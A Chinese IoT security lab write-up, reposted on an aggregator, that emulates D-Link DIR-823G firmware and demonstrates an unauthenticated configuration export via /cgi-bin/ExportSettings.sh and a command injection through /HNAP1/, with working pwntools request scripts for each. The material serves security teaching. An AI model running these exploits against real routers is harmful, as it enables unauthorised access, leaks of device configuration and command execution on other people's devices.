某60物联网安全之IoT漏洞利用实操1学习记录

这篇具有很好参考价值的文章主要介绍了某60物联网安全之IoT漏洞利用实操1学习记录。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

物联网安全


IoT漏洞利用实操1(逻辑漏洞)

实验目的

学会使用fat模拟IoT设备固件
学会使用IDA分析设备固件内服务程序的逻辑漏洞
学会使用pwntools与IoT设备服务交互并触发漏洞

实验环境

操作机:Ubuntu 20.04【用户名:user 密码:user】

实验工具

qemu
fat
binwalk
pwntools
IDA pro

实验原理

IoT 设备中可能存在各种漏洞,总结来说,这些漏洞可以被大体划分为两大类,一类是内存破坏型漏洞,另一类则是逻辑漏洞。而在逻辑漏洞中,又以未授权访问漏洞和命令注入漏洞最为常见。
未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致非管理员的任意用户可以直接访问,从而引发重要权限可被操作、数据库或设备内存等敏感信息泄露。
命令注入漏洞是指由于设备内服务程序对用户提交的数据过滤不严格,导致恶意用户可以通过构造特殊命令字符串的方式,将数据提交至应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者设备信息等。

实验内容

使用fat模拟IoT设备固件
进行IoT设备未授权访问漏洞的利用
进行IoT设备命令注入漏洞的利用

实验步骤

使用fat模拟IoT设备固件
本节实操课用来测试的设备是 Dlink DIR-823G ,首先利用 fat 工具将该设备的固件快速模拟运行起来。依次输入如下命令,进入该工具的目录,并利用该工具模拟固件文件 DIR823GA1_FW102B03.bin。
$ cd ~/firmware-analysis-toolkit
$ ./fat.py ~/Desktop/experiment2/DIR823GA1_FW102B03.bin
fat 工具会自动解压固件并修改内核,然后再重新打包,最后利用 QEMU 对重新打包的固件模拟运行,但是需要等待一段时间,由该工具自动配置适合该路由设备的网卡和IP地址。

当显示如下图所示的信息,则说明已经可以正常模拟运行固件。
iot设备漏洞,物联网,安全,学习

按下回车键就会进入 QEMU 模拟的终端,模拟的 Dlink DIR-823G 设备的地址为192.168.0.1。可以发现终端一直在不停的输出信息,但是其实并不影响命令的输入。

iot设备漏洞,物联网,安全,学习

可以在浏览器中访问该模拟设备的管理页面进行验证,显示如下图所示,表示模拟的路由器服务正常。

iot设备漏洞,物联网,安全,学习

进行IoT设备未授权访问漏洞的利用
路由设备 Dlink DIR-823G 通过 web 管理界面和用户进行交互,实际功能调用 cgi 实现,但是其 web 服务程序 goahead 没有相应 cgi 文件的权限校验,使得非授权用户也可以直接访问相应功能的 cgi,对设备造成严重影响。

该设备存在如下未授权可以直接访问调用的 cgi:

/cgi-bin/ExportSettings.sh 导出配置文件(信息泄露)

/cgi-bin/upload_settings.cgi 导入配置文件(恶意篡改配置)

/cgi-bin/upload_firmware.cgi 上传更新固件(恶意修改固件)

以未授权访问 /cgi-bin/ExportSettings.sh 导出配置文件为例。可以先在模拟的路由器的管理页面设置一个管理员用户。
iot设备漏洞,物联网,安全,学习
iot设备漏洞,物联网,安全,学习
iot设备漏洞,物联网,安全,学习
iot设备漏洞,物联网,安全,学习
iot设备漏洞,物联网,安全,学习

退出该用户帐号后,以匿名身份直接通过浏览器访问 /cgi-bin/ExportSettings.sh,发现可以正常导出配置文件。

iot设备漏洞,物联网,安全,学习

或者可以直接利用如下 pwntools 脚本伪造一个访问路由设备 /cgi-bin/ExportSettings.sh 的 HTTP 请求,可以同样获取该设备的配置文件。

from pwn import *

context.log_level = 'debug'
io = remote('192.168.0.1', 80)

content = '''GET /cgi-bin/ExportSettings.sh HTTP/1.1\r
Host: 192.168.0.1\r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\r
Accept: */*\r
Accept-Encoding: gzip, deflate\r
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r
Connection: close\r
\r
'''

io.send(content)

io.recv(1000)
io.recv(1000)

io.close()

iot设备漏洞,物联网,安全,学习

进行IoT设备命令注入漏洞的利用
路由设备 Dlink DIR-823G 的 web 服务程序 goahead 还存在命令注入漏洞,先通过命令 binwalk -Me ./DIR823GA1_FW102B03.bin 将其固件解包。
iot设备漏洞,物联网,安全,学习

进入到解包后的固件根目录 squashfs-root/bin/ 中,找到其web 服务程序 goahead ,通过 file 命令可以查看其架构为 MIPS。
iot设备漏洞,物联网,安全,学习

之后利用命令 wine ~/IDAPro7.5/ida.exe 打开 IDA,并通过 IDA 加载将要分析的固件内程序 goahead
iot设备漏洞,物联网,安全,学习

并按 G键打开地址跳转窗口,输入 0x42383C,跳转到漏洞函数 sub_42383C。

iot设备漏洞,物联网,安全,学习

之后按F5键查看函数 sub_42383C的反编译代码,不难看出存在命令注入漏洞。

iot设备漏洞,物联网,安全,学习

在函数名上按X键,通过交叉引用,逆向分析出该漏洞函数的触发流为:

main -> sub_423F90 -> sub_42383C

通过sub_423F90函数,可以分析出sub_42383C函数是访问 /HNAP1 这个 url 时对应的处理函数。

16

在触发该命令注入漏洞前,模拟该路由设备固件的终端内 web_mtn 目录下,没有 hack.txt 文件。
17

同时,浏览器也无法访问该 hack.txt 文件。

iot设备漏洞,物联网,安全,学习

可以通过如下的 pwntools 脚本生成能够触发该命令注入漏洞的请求,该恶意请求执行的命令为echo hacked_by_01dwang!!! > /web_mtn/hack.txt,即向设备的web页面根目录 web_mtn 目录内写入 hack.txt 文件。

from pwn import *

context.log_level = 'debug'
io = remote('192.168.0.1', 80)

content = '''POST /HNAP1/ HTTP/1.1\r
Host: 192.168.0.1\r
Content-Length: 54\r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\r
Content-Type: text/xml; charset=UTF-8\r
Accept: */*\r
SOAPAction: "http://purenetworks.com/HNAP1/Login"\r
Accept-Encoding: gzip, deflate\r
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r
Connection: close\r
\r
'`echo hacked_by_01dwang!!!!!!!! > /web_mtn/hack.txt`'
'''

io.send(content)

io.recv(1000)

io.close()

在通过脚本生成的恶意请求触发该命令注入漏洞后,路由设备的终端内 web_mtn 目录下,生成了 hack.txt 文件。
iot设备漏洞,物联网,安全,学习

同时,浏览器也可以访问该 hack.txt 文件。

iot设备漏洞,物联网,安全,学习文章来源地址https://www.toymoban.com/news/detail-835947.html

到了这里,关于某60物联网安全之IoT漏洞利用实操1学习记录的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 某60区块链安全之整数溢出漏洞实战学习记录

    ` 学会使用python3的web3模块 学会以太坊整数溢出漏洞分析及利用 Ubuntu18.04操作机 python3 低版本Solidity整数是uint无符号类型,若操作存在不安全行为,可能会产生溢出,通过分析代码找到漏洞点,实现整数溢出利用。 题目环境是测试链,所以需要本地与题目进行交互,可使用

    2024年02月03日
    浏览(43)
  • 什么是物联网?如何保护物联网iot安全性

    物联网iot:物联网(IoT)将生活中事物以网络进行连接,彼此交换信息。整个世界借由设备连接成一体。 对于消费者而言,这意味着您可以在大洋彼岸远程调节家中的恒温器。但是对企业而言,物联网不仅创造了连接客户和合作伙伴的新机会,还能有效收集、存储和分析海量

    2024年02月05日
    浏览(40)
  • 华为扫地僧:揭秘IoT+鸿蒙帮助企业突围物联网安全问题

    摘要: 通过介绍物联网安全架构以及华为云IoT+鸿蒙端边云协同安全实践,意在通过华为云IoT+鸿蒙帮助企业解决物联网安全问题。 在本期#码出未来,与你同行#HDC.Cloud2023华为云开发者社区系列直播之 《华为扫地僧揭秘IoT+鸿蒙帮助企业突围物联网安全问题》 的主题直播中,华

    2024年02月11日
    浏览(41)
  • 忽略了物联网(IoT)设备接入:物联网设备的接入安全管理被忽视

    标题: 忽略了的物联网(IoT)设备接入安全 引言 随着物联网技术的快速发展与普及应用,越来越多的企业和个人开始将各种智能设备和传感器连接到互联网上以优化生产、提高生活质量以及实现其他业务目标. 然而,由于缺乏有效的设备管理机制和安全的策略设计,这些物联网

    2024年02月22日
    浏览(42)
  • 踏入IOT安全世界:DIR-815路由器多次溢出漏洞分析复现

    在进行IOT安全领域的学习和实践中,经典漏洞的复现是必不可少的一环。本文将介绍一个经典漏洞,涉及到Binwalk、firmware-mod-kit、FirmAE等工具的使用,以及对DIR-815路由器中多次溢出漏洞的复现过程。 固件下载地址:https://legacyfiles.us.dlink.com/DIR-815/REVA/FIRMWARE/ 这个漏洞属于经典

    2024年03月26日
    浏览(50)
  • [车联网安全自学篇] Car Hacking之关于IoT安全该如何入门?你必须知道的那些事「3万字详解」

    也许每个人出生的时候都以为这世界都是为他一个人而存在的,当他发现自己错的时候,他便开始长大 少走了弯路,也就错过了风景,无论如何,感谢经历 物联网,也称为物联网(IoT),代表可以连接到互联网或内部网络的设备和外围设备的集合。这些设备有多种形状和尺

    2024年02月04日
    浏览(54)
  • 【网络安全】实操XSS订单系统漏洞(利用盲打)

    博主昵称:跳楼梯企鹅 博主主页面链接:

    2024年01月23日
    浏览(40)
  • 物联网(IoT)的北向和南向

    物联网(IoT)的北向和南向是指IoT系统中的数据流和通信方向,用于描述数据在系统中的传输和处理方向。以下是北向和南向在物联网中的含义: 北向通信(Northbound Communication): 北向通信是指数据从底层物联网设备(例如传感器、终端设备)向上层系统传输的通信方向。

    2024年02月03日
    浏览(36)
  • IOT(物联网)的七大通信协议

    在物联网协议中,我们一般分为两大类,一类是传输协议,一类是通信协议。传输协议一般负责子网内设备间的组网及通信;通信协议则主要是运行在传统互联网TCP/IP协议之上的设备通讯协议,负责设备通过互联网进行数据交换及通信。 上图为物联网联接的问题空间,其中物

    2024年02月07日
    浏览(46)
  • IoT -- 解读物联网四层架构

    本文以物联网四层架构为基础,从物联网产品设计的角度来解读每层架构的功能以及主要内容,旨在为物联网产品设计以及实现思路感兴趣的物联网产品或研发人员有些帮助。 通过互联网,人和人之间可以传递和交流信息。物联网,IoT,Internet of Things,顾名思义就是物和物之

    2024年02月08日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包